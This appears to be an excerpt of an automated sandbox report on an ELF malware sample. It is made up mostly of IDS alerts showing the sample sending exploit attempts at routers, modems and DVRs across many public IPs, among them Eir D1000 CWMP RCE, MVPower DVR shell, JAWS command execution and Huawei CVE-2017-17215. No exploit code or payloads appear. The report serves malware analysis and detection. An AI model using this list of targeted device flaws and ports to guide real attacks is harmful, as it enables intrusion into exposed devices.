ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.12.21.149

Timestamp:	03/18/24-09:58:36.196708
SID:	2025576
Source Port:	38954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 174.25.98.250

Timestamp:	03/18/24-09:58:34.443698
SID:	2023548
Source Port:	51874
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 179.53.210.42

Timestamp:	03/18/24-09:59:19.284387
SID:	2025883
Source Port:	52656
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.203.199.230

Timestamp:	03/18/24-09:59:51.919873
SID:	2030092
Source Port:	35572
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 94.152.11.161

Timestamp:	03/18/24-09:59:24.947349
SID:	2025883
Source Port:	55142
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.82.106.159

Timestamp:	03/18/24-09:59:39.961924
SID:	2023548
Source Port:	34082
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 54.236.148.44

Timestamp:	03/18/24-09:57:05.716903
SID:	2030092
Source Port:	43630
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.138.235.189

Timestamp:	03/18/24-09:59:39.926542
SID:	2023548
Source Port:	45734
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 64.23.148.185

Timestamp:	03/18/24-09:59:46.285613
SID:	2025883
Source Port:	59070
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 191.101.104.106

Timestamp:	03/18/24-10:00:20.321008
SID:	2025883
Source Port:	60506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 184.24.197.211

Timestamp:	03/18/24-09:59:37.731814
SID:	2030092
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 101.62.198.198

Timestamp:	03/18/24-09:57:05.950389
SID:	2030092
Source Port:	42340
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.228.6.152

Timestamp:	03/18/24-09:59:36.955467
SID:	2023548
Source Port:	59290
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.18.44

Timestamp:	03/18/24-09:57:05.433152
SID:	2018132
Source Port:	40822
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.13.156.184

Timestamp:	03/18/24-09:59:17.921654
SID:	2025576
Source Port:	46588
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 61.108.147.225

Timestamp:	03/18/24-09:58:29.758197
SID:	2023548
Source Port:	57792
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.226.28.131

Timestamp:	03/18/24-09:58:39.267840
SID:	2025576
Source Port:	46762
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.9.100

Timestamp:	03/18/24-09:59:26.018865
SID:	2018132
Source Port:	60532
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 103.178.216.155

Timestamp:	03/18/24-09:59:19.055968
SID:	2025576
Source Port:	46382
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.70.42.188

Timestamp:	03/18/24-10:00:10.106003
SID:	2030092
Source Port:	33386
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.152.237.167

Timestamp:	03/18/24-09:58:16.367159
SID:	2023548
Source Port:	38148
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.75.228.172

Timestamp:	03/18/24-09:58:49.635357
SID:	2023548
Source Port:	58492
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.235.104.82

Timestamp:	03/18/24-09:56:59.726386
SID:	2835222
Source Port:	39488
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.205.171.31

Timestamp:	03/18/24-10:00:05.945979
SID:	2023548
Source Port:	47738
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 111.246.195.159

Timestamp:	03/18/24-10:00:22.553508
SID:	2023548
Source Port:	34274
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 95.101.245.165

Timestamp:	03/18/24-09:58:15.592599
SID:	2025576
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.3.47.98

Timestamp:	03/18/24-09:58:56.368413
SID:	2023548
Source Port:	44546
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.132.34.199

Timestamp:	03/18/24-10:00:00.636807
SID:	2023548
Source Port:	58142
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 47.96.220.209

Timestamp:	03/18/24-09:59:41.461746
SID:	2025576
Source Port:	58616
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.17.27.131

Timestamp:	03/18/24-09:59:47.519564
SID:	2023548
Source Port:	48344
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.89.230.18

Timestamp:	03/18/24-09:59:51.525103
SID:	2030092
Source Port:	49402
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 192.143.12.15

Timestamp:	03/18/24-10:00:22.100311
SID:	2023548
Source Port:	53308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.127.209.150

Timestamp:	03/18/24-09:57:11.546478
SID:	2023548
Source Port:	40996
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 18.65.51.251

Timestamp:	03/18/24-10:00:15.141981
SID:	2025576
Source Port:	47178
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.5.233.191

Timestamp:	03/18/24-09:56:57.223096
SID:	2030092
Source Port:	50272
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.232.71.74

Timestamp:	03/18/24-09:58:32.119650
SID:	2023548
Source Port:	49384
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.123.65.181

Timestamp:	03/18/24-09:58:18.025948
SID:	2023548
Source Port:	33010
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.232.81.207

Timestamp:	03/18/24-09:58:36.482710
SID:	2023548
Source Port:	56868
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.42.115.120

Timestamp:	03/18/24-09:58:24.229048
SID:	2023548
Source Port:	55742
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.219.44.58

Timestamp:	03/18/24-09:59:19.205634
SID:	2030092
Source Port:	59040
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 170.249.13.75

Timestamp:	03/18/24-09:57:02.010819
SID:	2023548
Source Port:	34846
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 197.27.100.58

Timestamp:	03/18/24-09:58:38.454053
SID:	2023548
Source Port:	54062
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.44.62.77

Timestamp:	03/18/24-09:59:15.802465
SID:	2023548
Source Port:	40406
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.93.233.151

Timestamp:	03/18/24-09:59:15.529134
SID:	2025883
Source Port:	55986
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 159.203.27.226

Timestamp:	03/18/24-09:59:49.016247
SID:	2025883
Source Port:	44566
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.7.67.19

Timestamp:	03/18/24-09:59:15.233670
SID:	2025883
Source Port:	47108
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.86.113.125

Timestamp:	03/18/24-09:59:42.384699
SID:	2025576
Source Port:	40342
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.94.222.116

Timestamp:	03/18/24-10:00:21.281371
SID:	2023548
Source Port:	56744
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 152.70.246.154

Timestamp:	03/18/24-09:57:00.100876
SID:	2030092
Source Port:	32846
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.71.54.66

Timestamp:	03/18/24-09:58:16.117182
SID:	2023548
Source Port:	53298
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.137.173.174

Timestamp:	03/18/24-10:00:23.041419
SID:	2023548
Source Port:	35522
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.29.96.131

Timestamp:	03/18/24-10:00:21.292847
SID:	2023548
Source Port:	47656
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.142.253.93

Timestamp:	03/18/24-09:58:58.206512
SID:	2018132
Source Port:	45742
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 185.232.85.45

Timestamp:	03/18/24-09:59:06.624001
SID:	2030092
Source Port:	55012
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.47.238.33

Timestamp:	03/18/24-09:58:18.187018
SID:	2023548
Source Port:	55086
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.8.136

Timestamp:	03/18/24-09:59:39.445841
SID:	2018132
Source Port:	42840
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 111.202.89.239

Timestamp:	03/18/24-09:59:57.091254
SID:	2030092
Source Port:	34180
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.55.47.75

Timestamp:	03/18/24-10:00:06.095829
SID:	2023548
Source Port:	40242
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.205.171.31

Timestamp:	03/18/24-10:00:05.802281
SID:	2023548
Source Port:	47726
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 120.136.129.99

Timestamp:	03/18/24-09:59:52.967869
SID:	2025883
Source Port:	41278
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 211.228.200.196

Timestamp:	03/18/24-09:58:16.487387
SID:	2030092
Source Port:	39872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.173.248.126

Timestamp:	03/18/24-09:58:43.385761
SID:	2023548
Source Port:	55112
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 87.215.146.149

Timestamp:	03/18/24-09:59:55.864688
SID:	2023548
Source Port:	51168
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.155.81.181

Timestamp:	03/18/24-09:58:59.576319
SID:	2030092
Source Port:	56438
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 46.101.125.102

Timestamp:	03/18/24-09:58:16.369908
SID:	2030092
Source Port:	53854
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.49.205.172

Timestamp:	03/18/24-10:00:01.705702
SID:	2023548
Source Port:	58392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 160.16.137.118

Timestamp:	03/18/24-09:58:47.295670
SID:	2025883
Source Port:	53312
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.19.187.114

Timestamp:	03/18/24-09:59:10.392752
SID:	2030092
Source Port:	38324
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.211.5.73

Timestamp:	03/18/24-10:00:01.597018
SID:	2023548
Source Port:	40472
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 218.149.81.138

Timestamp:	03/18/24-09:58:32.423075
SID:	2023548
Source Port:	59162
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 107.175.159.85

Timestamp:	03/18/24-09:58:56.034377
SID:	2025883
Source Port:	35352
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 58.220.33.198

Timestamp:	03/18/24-09:58:43.988468
SID:	2025576
Source Port:	59244
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.197.46.105

Timestamp:	03/18/24-09:59:17.425627
SID:	2023548
Source Port:	56460
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 83.143.132.22

Timestamp:	03/18/24-09:56:59.247692
SID:	2030092
Source Port:	47934
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 3.22.116.196

Timestamp:	03/18/24-10:00:01.760584
SID:	2025576
Source Port:	43850
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.154.127

Timestamp:	03/18/24-09:59:31.987748
SID:	2018132
Source Port:	38110
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 108.128.117.78

Timestamp:	03/18/24-10:00:18.319783
SID:	2030092
Source Port:	38752
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 2.19.201.24

Timestamp:	03/18/24-09:57:00.084611
SID:	2030092
Source Port:	52388
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.236.106.122

Timestamp:	03/18/24-09:59:48.697626
SID:	2023548
Source Port:	49670
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.189.232.192

Timestamp:	03/18/24-10:00:21.221494
SID:	2023548
Source Port:	42570
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4lXTg8P7Ih.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: 4lXTg8P7Ih.elf	ReversingLabs: Detection: 65%
Source: 4lXTg8P7Ih.elf	Virustotal: Detection: 61%			Perma Link

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35514 -> 172.67.159.224:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:45226 -> 172.67.167.127:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42030 -> 172.66.196.91:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35940 -> 98.160.120.121:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58700 -> 172.64.236.36:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50272 -> 52.5.233.191:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52090 -> 38.28.174.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52090 -> 38.28.174.40:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48850 -> 49.107.36.197:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39664 -> 124.87.30.108:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48850 -> 49.107.36.197:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33678 -> 172.173.117.250:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47934 -> 83.143.132.22:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33678 -> 172.173.117.250:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52180 -> 38.28.174.40:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52062 -> 99.238.178.244:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55384 -> 103.112.224.208:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52138 -> 99.238.178.244:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52180 -> 38.28.174.40:80
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39488 -> 156.235.104.82:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39488 -> 156.235.104.82:37215
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35822 -> 40.76.156.8:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55384 -> 103.112.224.208:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52370 -> 142.197.229.125:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38734 -> 51.15.203.55:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37150 -> 23.216.137.146:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35822 -> 40.76.156.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53174 -> 76.12.139.97:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53486 -> 94.101.224.57:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47934 -> 83.143.132.22:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52370 -> 142.197.229.125:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53174 -> 76.12.139.97:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52388 -> 2.19.201.24:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32846 -> 152.70.246.154:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38734 -> 51.15.203.55:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52628 -> 172.65.202.91:8080
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53486 -> 94.101.224.57:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52388 -> 2.19.201.24:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48016 -> 83.143.132.22:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32846 -> 152.70.246.154:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47874 -> 99.247.16.221:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52000 -> 99.247.255.214:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33618 -> 172.90.168.5:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37150 -> 23.216.137.146:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58274 -> 179.235.85.170:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48036 -> 99.247.16.221:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52086 -> 99.247.255.214:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41680 -> 121.133.186.128:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41220 -> 86.178.198.25:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36606 -> 124.218.48.114:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54046 -> 86.133.48.241:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33704 -> 172.90.168.5:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49878 -> 62.90.227.131:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41820 -> 14.85.144.61:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49390 -> 86.144.50.78:7547
